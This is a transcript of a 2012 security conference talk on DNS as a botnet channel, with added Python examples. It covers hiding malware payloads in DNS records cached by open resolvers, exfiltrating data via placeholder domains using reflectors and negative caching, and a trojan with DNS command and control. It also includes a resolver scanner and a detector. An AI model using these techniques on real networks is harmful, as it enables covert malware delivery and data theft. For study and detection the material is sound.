#rootedcon2012 - dns: a botnet dialect - carlos diaz & francisco j. gomez
DESCRIPTION
Presented at RootedCON 2012, Madrid. Reviews Cloud Malware Distribution (CMD) and shows data-leak methods over DNS. Releases a new Flu trojan flavor that uses DNS as its communication channel.
TRANSCRIPT
CMD: Look who’s talking too
DNS: a botnet dialect
Francisco J. Gómez Rodríguez ([email protected]): • Computer Engineering (EUI-UPM) • Security Research (Telefonica R&D) • dig fran.rootedcon.themafia.info TXT
Carlos Díaz Hidalgo ([email protected]): • Telecommunications Engineer (ETSITM-UPM), GPEN, GCIH, OPST, ITILF and CCNA. • Technology Specialist in Ethical Hacking (Telefonica R&D) • dig charlie.rootedcon.themafia.info TXT
look who’s talking too
This presentation contains: one year ago … 3 mg • cloud malware distribution … 10 mg • dns is in the air … 10 mg • suspicion … 8 mg • data leak … 10 mg • laboratory … 10 mg
INTRODUCTION
One year ago …
• We talked about DNS and Malware. • We released Cloud Malware Distribution (CMD): – An alternative method for malware distribution using cache DNS services.
– Using the client's default DNS settings. – Malware source virtually untraceable.
A DNS shot
CMD: Cloud Malware Distribution in a nutshell
Cloud Malware Distribution 1. Encoding: Split the malware payload into DNS records.
2. Publishing: Publish the domain and each record on a public name server.
3. Loading: Force an Open Emitter DNS cache server to store all the records.
4. Downloading: The infected host (bot) downloads the records.
5. Decoding: Rebuild the malware payload from the records.
Diagram: steps 1-2 (encode and publish) at the authoritative server, step 3 (load) into the Open Emitter DNS, step 4 (download) by the bot, step 5 (decode) on the bot; record names 8rjqerkjqet.cmdns.domain.com, ueirytbdosu.cmdns.domain.com, ktqtr53xase.cmdns.domain.com, kzmfzzmfzze.cmdns.domain.com.
Cloud Malware Distribution (I): Encoding & Publish
DNS AUTH: Freedns.afraid.org
8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze → 8rjqerkjqet | ueirytbdosu | ktqtr53xase | kzmfzzmfzze
8rjqerkjqet.cmdns.domain.com
ueirytbdosu.cmdns.domain.com
ktqtr53xase.cmdns.domain.com
kzmfzzmfzze.cmdns.domain.com
• From the malware file we create a base32-encoded string (its alphabet, A-Z and 2-7, consists of characters that are valid in hostnames).
• Then we split the string into DNS-compliant records: each chunk becomes a label (at most 63 octets, RFC 1035) of a name under the publication domain, published on a free authoritative DNS service.
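The encode, split and decode steps above, as an added example in Python (the CMD tool itself is PHP/C#; this is not its code). The zone cmdns.domain.com is the placeholder from the slides and the 11-character chunk size matches the labels shown there; carrying the chunk index as a second label (s0, s1, …) is an assumption, since the slides do not show how the bot learns the record order.

```python
import base64
import re

MAX_LABEL = 63     # RFC 1035: a label is at most 63 octets
MAX_NAME = 253     # practical limit for a full presentation-format name
LABEL_RE = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?$")
BASE_DOMAIN = "cmdns.domain.com"   # placeholder publication zone from the slides


def validate_name(name: str) -> None:
    """Reject names a resolver or authoritative server would not accept."""
    if len(name) > MAX_NAME:
        raise ValueError(f"name too long: {len(name)} > {MAX_NAME}")
    for label in name.split("."):
        if not 1 <= len(label) <= MAX_LABEL or not LABEL_RE.match(label):
            raise ValueError(f"bad label: {label!r}")


def encode_payload(payload: bytes, base_domain: str = BASE_DOMAIN,
                   chunk_len: int = 11) -> list:
    """Encoding step: base32 the payload and split it into one name per chunk.

    Base32 is used because its alphabet (A-Z, 2-7) is valid in hostnames;
    DNS is case-insensitive so the labels are lowercased, and the '=' padding
    (not hostname-safe) is stripped here and restored on decode.  The chunk
    index travels as a second label ('s<n>') so the bot can reorder records;
    that ordering label is an assumption, not something the slides show.
    """
    if not 1 <= chunk_len <= MAX_LABEL:
        raise ValueError("chunk_len must be between 1 and 63")
    b32 = base64.b32encode(payload).decode("ascii").lower().rstrip("=")
    names = []
    for seq, start in enumerate(range(0, len(b32), chunk_len)):
        name = f"{b32[start:start + chunk_len]}.s{seq}.{base_domain}"
        validate_name(name)
        names.append(name)
    return names


def decode_records(names: list) -> bytes:
    """Decoding step: reassemble the base32 string from the data labels.

    Records may arrive in any order; a missing or duplicated chunk is an
    error rather than a silently corrupt file.
    """
    chunks = {}
    for name in names:
        data, seq, *_ = name.lower().split(".")
        index = int(seq[1:])
        if index in chunks:
            raise ValueError(f"duplicate record {index}")
        chunks[index] = data
    if sorted(chunks) != list(range(len(chunks))):
        raise ValueError("missing records, cannot rebuild payload")
    b32 = "".join(chunks[i] for i in range(len(chunks)))
    b32 += "=" * (-len(b32) % 8)          # restore the base32 padding
    return base64.b32decode(b32, casefold=True)


if __name__ == "__main__":
    sample = b"MZ\x90\x00" + bytes(range(256))   # constructed stand-in for a binary
    records = encode_payload(sample)
    print(f"{len(sample)} bytes -> {len(records)} DNS names, e.g. {records[0]}")
    assert decode_records(records[::-1]) == sample
```

Each name costs the bot one query at download time, so the payload size in base32 characters divided by the chunk length is the number of records the open emitter has to hold.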
Cloud Malware Distribution (II): Loading
DNS AUTH (Freedns.afraid.org) → Open Emitter DNS
cmdns.domain.com NS?
Split[1..n].cmdns.domain.com A?
8rjqerkjqet.cmdns.domain.com, ueirytbdosu.cmdns.domain.com, ktqtr53xase.cmdns.domain.com, kzmfzzmfzze.cmdns.domain.com
• We upload each DNS record from the malicious authoritative DNS into the Open Emitter.
• This is done simply by requesting each record from the Open Emitter DNS (one recursive query per name).
• The server then caches each record.
Cloud Malware Distribution (III): Downloading
DNS AUTH (Freedns.afraid.org) → Open Emitter DNS → bots
• Once the Open Emitter has cached all the records, we turn it into the authoritative server for the domain (by pointing the domain's NS delegation at it).
• From now on the Open Emitter resolves all queries for the domain. • Thus every DNS server on the Internet can resolve the malware records and the bots can fetch them, while the original authoritative server is no longer contacted.
8rjqerkjqet.cmdns.domain.com ueirytbdosu.cmdns.domain.com ktqtr53xase.cmdns.domain.com kzmfzzmfzze.cmdns.domain.com
Cloud Malware Distribution (IV): Decoding
8rjqerkjqet.cmdns.domain.com + ueirytbdosu.cmdns.domain.com + ktqtr53xase.cmdns.domain.com + kzmfzzmfzze.cmdns.domain.com → 8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze
• With all the retrieved records the bot can rebuild the original file.
• The bot now has the updated malware file.
Own survey: yesterday and today

                               February 2011          March 2012
                               Spain       USA        Spain       USA
Queried hosts                  10,406      10,406     8,217       8,217
Replying hosts                 87.22%      87.39%     87.58%      87.69%
Open resolvers                 76.46%      77.28%     95.45%      82.08%
Open emitters                  57.76%      57.33%     53.78%      53.51%
Accept +norecurse queries      55.91%      55.49%     87.67%      74.44%
TTL ≥ 604800                   43.05%      42.94%     51.24%      49.32%
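The rows of that survey can be reproduced with a small amount of Python on top of raw UDP; this is an added example, not the authors' survey tool. It builds a query with or without the RD bit (dig +norecurse clears it), parses the response header, flags and answer TTLs, and classifies the server the way the table does: open resolver (recursed for a name it is not authoritative for), open emitter (answered a non-recursive query from its cache), and whether it caches for a week or more. make_response is a constructed fixture so the parser can be exercised offline; send_query does the network part and should only be pointed at servers you are authorised to test.

```python
import random
import socket
import struct
import time

TTL_WEEK = 604800          # the "TTL >= 604800" row of the survey


def build_query(name: str, qtype: int = 1, recursion_desired: bool = True,
                txid: int = None) -> bytes:
    """Wire-format query; RD clear is what dig +norecurse sends."""
    txid = random.randrange(65536) if txid is None else txid
    flags = 0x0100 if recursion_desired else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii")
                     for l in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def _read_name(msg: bytes, off: int):
    """Decode a (possibly compressed) name; returns (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:                  # compression pointer
            pointer = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            end = off + 2 if end is None else end
            off, hops = pointer, hops + 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def parse_response(msg: bytes) -> dict:
    """Header flags, RCODE and the answer section (name, type, TTL, rdata)."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    info = {"id": txid, "aa": bool(flags & 0x0400), "rd": bool(flags & 0x0100),
            "ra": bool(flags & 0x0080), "rcode": flags & 0x000F, "answers": []}
    off = 12
    for _ in range(qd):
        _, off = _read_name(msg, off)
        off += 4                                      # QTYPE + QCLASS
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        info["answers"].append({"name": name, "type": rtype, "ttl": ttl,
                                "rdata": msg[off:off + rdlen]})
        off += rdlen
    return info


def classify(sent_rd: bool, resp: dict) -> str:
    """Survey categories for a name the server is not authoritative for:
    'open resolver' (it recursed for us) or 'open emitter' (it answered a
    non-recursive query from its cache)."""
    if resp["rcode"] == 5:
        return "refused"
    if resp["aa"]:
        return "authoritative"
    if resp["answers"]:
        return "open resolver" if sent_rd else "open emitter"
    return "no data (rcode %d)" % resp["rcode"]


def caches_a_week(resp: dict) -> bool:
    return any(a["ttl"] >= TTL_WEEK for a in resp["answers"])


def make_response(query: bytes, ttl: int, ip: str, aa: bool, ra: bool,
                  rcode: int = 0) -> bytes:
    """Constructed reply to `query` (test fixture, not captured traffic)."""
    txid, qflags = struct.unpack("!HH", query[:4])
    flags = (0x8000 | (qflags & 0x0100) | (0x0400 if aa else 0)
             | (0x0080 if ra else 0) | (rcode & 0xF))
    answer = b""
    if rcode == 0:                                    # one A record, name via pointer
        answer = (b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4)
                  + bytes(int(o) for o in ip.split(".")))
    header = struct.pack("!HHHHHH", txid, flags, 1, 1 if answer else 0, 0, 0)
    return header + query[12:] + answer


def send_query(server: str, query: bytes, timeout: float = 2.0):
    """One UDP query; returns (response, elapsed_ms). The elapsed time is the
    query-time field that the dig-based checks later in the deck rely on."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        start = time.monotonic()
        sock.sendto(query, (server, 53))
        data, _ = sock.recvfrom(4096)
    return data, (time.monotonic() - start) * 1000.0
```

A scan sends the same name twice, once with RD set and once cleared, and records both classifications plus the TTL; the second query is the one that distinguishes a mere open resolver from an open emitter that will hand its cache to anyone.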
A quick test…
"In the same way that SSL turns HTTP web traffic into HTTPS encrypted web traffic, DNSCrypt turns regular DNS traffic into encrypted DNS traffic that is secure from eavesdropping and man-in-the-middle attacks." (DNSCrypt project description)
DNSCrypt
… a quick demo.
Summary: DNSCrypt only protects the hop between the client and its resolver, so with DNSCrypt in use the CMD method still works.
DNS IS IN THE AIR: DNS yesterday, today, and tomorrow
Are you talking to me?
• Let's see some about… – DNS as covert channel. – DNS uses in malware communications.
DNS as Covert Channel
• OzymanDNS (Kaminsky) • Dnscapy • NSTX, Iodine: use several RR types (NULL, TXT, CNAME).
• Dns2tcp & TCP-over-DNS: relay TCP connections. • LoopcVPN: one China-Telecom hotspot nightmare.
Stateless malware (I) • TSPY_ZBOT.SMQH
– Another modified ZeuS variant seen in the wild. – Reported in September 2011 by Trend Micro. – Data exchange now also happens over UDP. – http://blog.trendmicro.com/another-modified-zeus-variant-seen-in-the-wild/
Stateless malware (II) • Older versions used TCP to exchange configuration files. However, the new version exchanges all data over UDP. – http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet
Where there's smoke, there's fire.
Feedorbot
• Uses the DNS protocol. – Feedorbot receives encrypted commands from the C&C. – Data is encapsulated in TXT records, Base64 encoded. – http://www.cj2s.de/On-Botnets-that-use-DNS-for-Command-and-Control.pdf
Hiloti
• Through DNS queries Hiloti reports the infected host's status, for example: – http://blog.fortinet.com/hiloti-the-botmaster-of-disguise
142625.bc7a3d45.01.0AC1FD9D62074E6D9D2889088284DAB5.n.empty.1148.empty.5_1._t_i.ffffffff.explorer_exe.173.rc2.a4h9uploading.com
• Although it uses DNS as its control protocol, bots download update files from "file hosting" servers over HTTP.
Morto
• From IRC to DNS. – Morto, like Feedorbot, uses TXT records to communicate. – http://www.symantec.com/connect/blogs/morto-worm-sets-dns-record
GATHERING & EVALUATING INFORMATION
Gathering & Evaluating Information (I)
• http://www.wombat-project.eu/
• http://exposure.iseclab.org/index.html
Gathering & Evaluating Information (II) • https://dnsdb.isc.org/#Home
• http://www.webboar.com
Gathering & Evaluating Information (III) • Don't forget the classics:
– http://www.robtex.com/
Learned in #Rooted2012 • http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/
Sometimes … I see dead people
• September, 2011 (Top 10 Malicious Domains)
Scratch & Win
And Then There Were None • http://www.webboar.com/ip/67.15.149.70/
– 25 domain(s) on IP address 67.15.149.70 • azxdf.com • mjuyh.com • hjuyv.com • plokm.com • nbgtr.com • vcxde.com • asljd.com • brutillor5.com
• civiticle0.com • ckubf.com • djhbw.com • himovingto8.com • hiuxd.com • liunj.com • loijm.com • mjrth.com
• morewallfalls7.com • okjyu.com • orn2hcb.com • qlovg.com • quilution2.com • uncdt.com • xvfar.com • zscdw.com • zukamosion3.com
Sometimes … I see dead people
CMD could be alive!
DATA LEAK OVER DNS
Traditional data leak using DNS
(1) Bot → Cache DNS (public or private): queries DataLeakRecord1.[OUTPUT_DOMAIN], DataLeakRecord2.[OUTPUT_DOMAIN], …
(2) Cache DNS → DNS Auth. (OUTPUT_DOMAIN): the attacker's authoritative server receives DataLeakRecord1, DataLeakRecord2, … in the query names.
Using a DNS reflector
(1) Bot → Cache DNS (public or private): DataLeakRecord1.[OUTPUT_DOMAIN], …
(2) Cache DNS → DNS Auth. (OUTPUT_DOMAIN): receives the leaked record names.
(3) Force Data Leak Upload (CMD): the records are republished as Data1, Data2, … under [PUBLICATION_DOMAIN] on a DNS Auth. that is an open emitter + cache.
(4) Attacker → Cache DNS: Data1.[PUBLICATION_DOMAIN], …
(5) Cache DNS → DNS Auth. (open emitter + cache, PUBLICATION_DOMAIN): Data1 → DataLeakRecord1 is recovered.
DNS reflector (demo)
Using Fast-Flux DNS reflectors
Same flow as the DNS reflector above, with the reflector role (DNS Auth. as open emitter + cache for PUBLICATION_DOMAIN) spread over changing servers: (1) Bot → Cache DNS (public or private): DataLeakRecord1.[OUTPUT_DOMAIN], … (2) Cache DNS → DNS Auth. (OUTPUT_DOMAIN). (3) Force Data Leak Upload (CMD): Data1, Data2, … under [PUBLICATION_DOMAIN]. (4)-(5) Attacker → Cache DNS → DNS Auth. (open emitter + cache, PUBLICATION_DOMAIN): Data1.[PUBLICATION_DOMAIN], Data1 → DataLeakRecord1.
Data Leak using NXDOMAIN responses
• NXDOMAIN responses are cached: – Negative caching is useful. – TTL value: the SOA 'minimum' field is used as the negative (NXDOMAIN) caching time (RFC 2308; strictly, the smaller of the SOA MINIMUM field and the SOA record's own TTL, and resolvers may cap it further, e.g. BIND's max-ncache-ttl defaults to 3 hours).
• Other queries may reuse parts of the lookup (quick response).
Caching NXDOMAIN responses (I-III): dig output screenshots.
Data leak with "dig": the fields to watch are RCODE, TTL and QUERY TIME.
Leak recovery with "dig":
(I) TTL < 86400, QUERY TIME < 300 msec: the name was already cached (TTL is counting down, answer came from the cache).
(II) TTL = 86400, QUERY TIME approx. 300 msec: a fresh lookup went all the way to the authoritative server, and our own probe has just put the name into the cache. It is not a good method for recovery!
(III) TTL < 86400, QUERY TIME < 300 msec: cached.
(IV) +norecurse probe: RCODE ≠ NXDOMAIN with QUERY TIME < 300 msec means the name was not cached and no lookup was triggered. It is the preferred method for recovery, because a non-recursive probe never pollutes the cache or contacts the authoritative server.
Data Leak using NXDOMAIN responses (diagram)
(1) Bot → DNS (Open emitter + cache): recursive queries for every suffix of the record, 1.[OUTPUT_DOMAIN], d1.[OUTPUT_DOMAIN], rd1.[OUTPUT_DOMAIN], …, ataleakrecord1.[OUTPUT_DOMAIN], dataleakrecord1.[OUTPUT_DOMAIN]
(2) DNS (Open emitter + cache) → DNS Auth. (OUTPUT_DOMAIN): each name is answered NXDOMAIN, which the open emitter caches.
(3) Recovery: probe the open emitter with +norecurse queries a.[OUTPUT_DOMAIN], b.[OUTPUT_DOMAIN], …, z.[OUTPUT_DOMAIN], 1.[OUTPUT_DOMAIN], a1.[OUTPUT_DOMAIN], … and check the RESPONSE: RCODE? TTL value? Query time? A cached NXDOMAIN reveals the next character of the record.
NXDOMAIN (demo)
Data Leak using "nice" domains
• There are authoritative DNS servers that: – Simply point all unknown DNS queries to a single IP address (a wildcard record).
– Minimum TTL value on the order of 1-7 days.
• Where can I find them? – Alexa "Top Sites": http://www.alexa.com/topsites
inbox.com imgur.com motherless.com wikia.com wikispaces.com pbworks.com …
Caching 'nice' responses (I-II): dig output screenshots.
Data Leak using 'nice' domains (diagram)
(1) Bot → DNS (Open emitter + cache): recursive queries for every suffix of the record, 1.[OUTPUT_DOMAIN], d1.[OUTPUT_DOMAIN], rd1.[OUTPUT_DOMAIN], …, ataleakrecord1.[OUTPUT_DOMAIN], dataleakrecord1.[OUTPUT_DOMAIN]
(2) DNS (Open emitter + cache) → 'nice' DNS Auth. (OUTPUT_DOMAIN): every name gets the same answer with a long TTL, and the open emitter caches each one.
(3) Recovery: probe the open emitter with +norecurse queries a.[OUTPUT_DOMAIN], b.[OUTPUT_DOMAIN], …, z.[OUTPUT_DOMAIN], 1.[OUTPUT_DOMAIN], a1.[OUTPUT_DOMAIN], … and check the RESPONSE: ANSWER SECTION present? TTL value below the maximum? A cached answer reveals the next character of the record.
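Both cache-based leaks (NXDOMAIN responses and 'nice' domains) can be simulated end to end. The following is an added example, not the authors' demo code: it models an authoritative server for [OUTPUT_DOMAIN] in two modes (strict: unknown names get NXDOMAIN with the SOA-minimum negative TTL; nice: a wildcard answers everything with one IP and a long TTL), an open emitter that caches and also serves +norecurse queries, a bot that leaks a record by querying each of its suffixes, and a receiver that recovers the record character by character from what the cache holds. The domain leak.example, the 86400 s TTL and the a-z0-9 probe alphabet are assumptions.

```python
import string

ALPHABET = string.ascii_lowercase + string.digits   # hostname-safe leading characters
OUTPUT_DOMAIN = "leak.example"                      # stands in for [OUTPUT_DOMAIN]
MAX_TTL = 86400                                     # SOA minimum / wildcard TTL (1 day)


class Clock:
    """Simulated time so cached TTLs can be seen counting down."""
    def __init__(self):
        self.now = 0

    def tick(self, seconds):
        self.now += seconds


class AuthServer:
    """Authoritative server for OUTPUT_DOMAIN.
    strict: only www exists, anything else is NXDOMAIN (negative TTL = SOA minimum).
    nice:   wildcard, every name gets the same A record with a long TTL."""
    def __init__(self, mode, ttl=MAX_TTL):
        self.mode, self.ttl, self.queries = mode, ttl, 0

    def answer(self, name):
        self.queries += 1
        if self.mode == "nice" or name == "www." + OUTPUT_DOMAIN:
            return "NOERROR", "192.0.2.1", self.ttl
        return "NXDOMAIN", None, self.ttl


class OpenEmitter:
    """Caching resolver that also answers RD=0 (+norecurse) queries from its cache."""
    def __init__(self, auth, clock):
        self.auth, self.clock, self.cache, self.queries = auth, clock, {}, 0

    def query(self, name, rd=True):
        """Returns (rcode, rdata, ttl_remaining). An uncached RD=0 query gets a
        referral: NOERROR, no answer, no TTL (what dig shows for a non-cached name)."""
        self.queries += 1
        hit = self.cache.get(name)
        if hit and hit[2] > self.clock.now:
            return hit[0], hit[1], hit[2] - self.clock.now
        if not rd:
            return "NOERROR", None, None
        rcode, rdata, ttl = self.auth.answer(name)
        self.cache[name] = (rcode, rdata, self.clock.now + ttl)
        return rcode, rdata, ttl


def leak(resolver, message):
    """Bot side: one recursive query per suffix (1, d1, rd1, ..., the whole record)
    so the open emitter caches a chain of entries. Returns the query count."""
    for i in range(1, len(message) + 1):
        resolver.query(f"{message[-i:]}.{OUTPUT_DOMAIN}", rd=True)
    return len(message)


def probe(resolver, label, mode):
    """Receiver side: a +norecurse query never reaches the authoritative server;
    a cached NXDOMAIN (strict) or a cached answer (nice) is a hit."""
    rcode, rdata, ttl = resolver.query(f"{label}.{OUTPUT_DOMAIN}", rd=False)
    if mode == "strict":
        return rcode == "NXDOMAIN"
    return rdata is not None and ttl is not None and ttl <= MAX_TTL


def recover(resolver, mode, max_len=63):
    """Grow the record from the right: find the cached single character, then the
    cached two-character suffix, ... until no extension is cached.
    Returns (message, number of probes sent)."""
    suffix, probes = "", 0
    while len(suffix) < max_len:
        for ch in ALPHABET:
            probes += 1
            if probe(resolver, ch + suffix, mode):
                suffix = ch + suffix
                break
        else:
            break
    return suffix, probes


if __name__ == "__main__":
    for mode in ("strict", "nice"):
        clock, auth = Clock(), AuthServer(mode)
        emitter = OpenEmitter(auth, clock)
        sent = leak(emitter, "dataleakrecord1")
        clock.tick(3600)                      # the receiver comes along an hour later
        got, probes = recover(emitter, mode)
        print(f"{mode}: sent {sent} queries, recovered {got!r} with {probes} probes, "
              f"authoritative server saw {auth.queries} queries")
```

Scanning a 36-symbol alphabet costs on average about 18 probes per recovered character, which is the order of the "20 queries/B" download figure in the conclusions table, and the authoritative server for the domain never sees the recovery traffic. The simulation also shows why the channel dies with the cache: once the TTL has run out, recover returns an empty string.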
Conclusions data-leak

Method                          Uses client default   Upload queries   Exposes cybercrime   Download queries   Score (0-10)
                                DNS settings          needed           infrastructure       needed
Traditional DNS tunneling       YES                   2 queries/kB     YES                  -                  5
Using Fast-Flux DNS reflectors  YES                   2 queries/kB     YES                  2 queries/kB       4
Using NXDOMAIN responses        NO                    2 queries/B      NO                   20 queries/B       2
Using "nice" domains            NO                    2 queries/B      NO                   20 queries/B       6
ToDo: Improvement++ • Data leak using 'nice' domains. But remember that: – It must use the client's default DNS settings.
• Maybe we can use third-party resources … (once again) – … Use misconfigured DNS (proxy DNS, cache DNS, authoritative server, …).
– e.g. servers that ignore the "+norecurse" flag, have "minimal-responses" configured, etc.
• Result: Untraceable data leaks
Harder than finding a needle in a haystack!
LABORATORY: Are we infected?
Making the lab.
• We need a "real" threat… • But we are "ethical"… • And we are not developers…
Searching…
And the winner is… Flu
• Written in C# and PHP • GNU/GPL • Geared to building botnets • HTTP communication
How Flu works
• The Flu server shares an XML commands file. • Infected hosts get the XML file through an HTTP request.
Flu Infected Host ⇄ Flu SERVER, over HTTP
Flu and CMD
• We use CMD to distribute the XML commands file. • Our dream: Flu becomes a stateless trojan. • Then we'll have a stateless-trojan GPL botnet.
Flu Infected Host ⇄ Open Emitter DNS ⇄ Flu DNS, over DNS/UDP
HTTP/TCP vs DNS/UDP: 1 GET = 11 packets and 1 connection; 1 query = 2 packets and 0 connections.
Flu and CMD: Server
• PHP 5.3.0 or higher required. • Three steps:
1. Create the domain.db file (external lib: Tar.php). 2. Load the XML file into the DNS server (native lib). 3. Download data from the infected host (native lib).
Flu and CMD: 3rd Party
• ISC BIND • FreeDNS.afraid.org • HE free DNS service • Misconfigured DNS server.
Open Emitter
Flu and CMD: Client
• We use the ARSoft.Tools.Net library. • Without GUI changes:
– We use domainload for the data leak. – We use domaindownload to get the XML file.
Flu and CMD: How it works (I)
Flu DNS → (XML2DNS, LOADXML) → Open Emitter DNS → (DOWNLOADXML) → Flu Infected Host, all over DNS
Flu and CMD: How it works (II)
Flu Infected Host → Open Emitter DNS → Flu C&C, over DNS
1. How does Flu call back? – NXDOMAIN can: track new bots. – NXDOMAIN can't: send huge files.
2. Then… we need to expose a DNS server: (1) Flu Infected Host → Cache DNS → DNS Server (Flu DNS): NXDOMAIN query; (2) DNS Server → Cache DNS → Flu Infected Host: NOERROR.
Flu and CMD: Demo
Conclusions
• DNS is a botnet dialect… – One year ago DNS was a possibility, today it could be a real threat.
• Data leak using DNS needs improvement… – …but it is a work in progress.
• Malware needs to communicate undetected, and IDS wants to detect malware. – Both must be looking at the same thing… DNS.
• Don't forget the DNS protocol
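For the detection side of that last point, here is an added example (not from the talk) of the checks a resolver-log analyser can run: per registered domain it counts distinct names, the fraction of NXDOMAIN answers, the length of the part to the left of the domain, and the Shannon entropy of all those subdomain characters taken together. The log lines are constructed (the CMD names from the slides, the Hiloti query shown earlier, an NXDOMAIN suffix chain, and benign traffic); taking the last two labels as the "registered domain" and the thresholds are assumptions to tune per environment.

```python
import math
from collections import defaultdict

# Constructed resolver log (timestamp client qname qtype rcode); not a real capture.
SAMPLE_LOG = """\
2012-03-01T10:00:01 10.0.0.5 www.example.org A NOERROR
2012-03-01T10:00:02 10.0.0.5 www.example.org A NOERROR
2012-03-01T10:00:03 10.0.0.6 mail.example.org A NOERROR
2012-03-01T10:00:04 10.0.0.6 cdn.example.org A NOERROR
2012-03-01T10:00:05 10.0.0.7 img1.static.example.net A NOERROR
2012-03-01T10:00:06 10.0.0.7 img2.static.example.net A NOERROR
2012-03-01T10:00:07 10.0.0.7 img3.static.example.net A NOERROR
2012-03-01T10:00:08 10.0.0.7 img4.static.example.net A NOERROR
2012-03-01T10:00:09 10.0.0.7 img5.static.example.net A NOERROR
2012-03-01T10:00:10 10.0.0.7 img6.static.example.net A NOERROR
2012-03-01T10:01:00 10.0.0.9 8rjqerkjqet.cmdns.domain.com A NOERROR
2012-03-01T10:01:01 10.0.0.9 ueirytbdosu.cmdns.domain.com A NOERROR
2012-03-01T10:01:02 10.0.0.9 ktqtr53xase.cmdns.domain.com A NOERROR
2012-03-01T10:01:03 10.0.0.9 kzmfzzmfzze.cmdns.domain.com A NOERROR
2012-03-01T10:01:04 10.0.0.9 mfrgg43ufzx.cmdns.domain.com A NOERROR
2012-03-01T10:01:05 10.0.0.9 wa2dinbvgy3.cmdns.domain.com A NOERROR
2012-03-01T10:01:06 10.0.0.9 tenbvgy3tqa.cmdns.domain.com A NOERROR
2012-03-01T10:01:07 10.0.0.9 nrqxe2lomvz.cmdns.domain.com A NOERROR
2012-03-01T10:02:00 10.0.0.9 1.leak.example A NXDOMAIN
2012-03-01T10:02:01 10.0.0.9 d1.leak.example A NXDOMAIN
2012-03-01T10:02:02 10.0.0.9 rd1.leak.example A NXDOMAIN
2012-03-01T10:02:03 10.0.0.9 ord1.leak.example A NXDOMAIN
2012-03-01T10:02:04 10.0.0.9 cord1.leak.example A NXDOMAIN
2012-03-01T10:02:05 10.0.0.9 ecord1.leak.example A NXDOMAIN
2012-03-01T10:03:00 10.0.0.9 142625.bc7a3d45.01.0AC1FD9D62074E6D9D2889088284DAB5.n.empty.1148.empty.5_1._t_i.ffffffff.explorer_exe.173.rc2.a4h9uploading.com A NOERROR
"""


def shannon_entropy(text: str) -> float:
    """Bits per character over the given text (0 for an empty string)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    total = len(text)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def base_domain(qname: str) -> str:
    """Assumption: the last two labels are the registered domain (production
    code would consult a public suffix list for names like example.co.uk)."""
    return ".".join(qname.split(".")[-2:])


def analyze(log_text: str) -> dict:
    """Per-domain features from 'timestamp client qname qtype rcode' lines."""
    per = defaultdict(lambda: {"queries": 0, "names": set(), "nx": 0, "subs": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, _qtype, rcode = line.split()
        qname = qname.rstrip(".").lower()
        dom = base_domain(qname)
        rec = per[dom]
        rec["queries"] += 1
        rec["names"].add(qname)
        rec["nx"] += rcode == "NXDOMAIN"
        rec["subs"].append(qname[:-len(dom)].rstrip(".") if qname != dom else "")
    features = {}
    for dom, rec in per.items():
        blob = "".join(s.replace(".", "") for s in rec["subs"])   # all subdomain chars
        features[dom] = {
            "queries": rec["queries"],
            "unique_names": len(rec["names"]),
            "nx_ratio": rec["nx"] / rec["queries"],
            "mean_sub_len": sum(map(len, rec["subs"])) / rec["queries"],
            "max_sub_len": max(map(len, rec["subs"])),
            "entropy": shannon_entropy(blob),
        }
    return features


def flag(features: dict, min_unique=6, entropy_t=3.5, mean_len_t=20,
         max_len_t=60, nx_t=0.5) -> dict:
    """Domains worth a look, with the reasons; every threshold is an assumption."""
    hits = {}
    for dom, f in features.items():
        reasons = []
        if f["max_sub_len"] >= max_len_t:
            reasons.append("very long name (data carried in the query)")
        if f["unique_names"] >= min_unique:            # one-off names are noise
            if f["entropy"] >= entropy_t:
                reasons.append("high-entropy labels (encoded payload)")
            if f["mean_sub_len"] >= mean_len_t:
                reasons.append("long labels across many distinct names")
            if f["nx_ratio"] >= nx_t:
                reasons.append("mostly NXDOMAIN (negative-cache channel or C&C callbacks)")
        if reasons:
            hits[dom] = reasons
    return hits


if __name__ == "__main__":
    for dom, reasons in flag(analyze(SAMPLE_LOG)).items():
        print(dom, "->", "; ".join(reasons))
```

The busy-but-benign CDN names stay under the entropy threshold because their labels repeat the same few characters, while the base32 chunks of CMD push the entropy up even though each individual label is short; the NXDOMAIN chain is caught by its answer codes rather than its content, which is why the rcode belongs in the log in the first place.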
QuesGons?
Who invented the rootedcon?
Rootedcon is your parents
Three Magic Kings Santa
Perez the mouse
References
§ http://code.kryo.se/iodine/
§ http://dns.measurement-factory.com/
§ http://darkwing.uoregon.edu/~joe/secprof10-dns/secprof10-dns.pdf
§ http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Kaminsky.pdf
§ http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-kaminsky/bh-us-04-kaminsky.ppt
§ http://www.pcworld.com/article/220024/feds_accidentally_seize_84000_innocent_domains_link_them_with_child_porn.html
§ http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf
§ http://www.secdev.org/projects/scapy/
§ https://www.isc.org/software/bind/documentation/arm95#man.dig
§ http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl
§ http://hakin9.org/magazine/1652-mobile-malware-the-new-cyber-threat
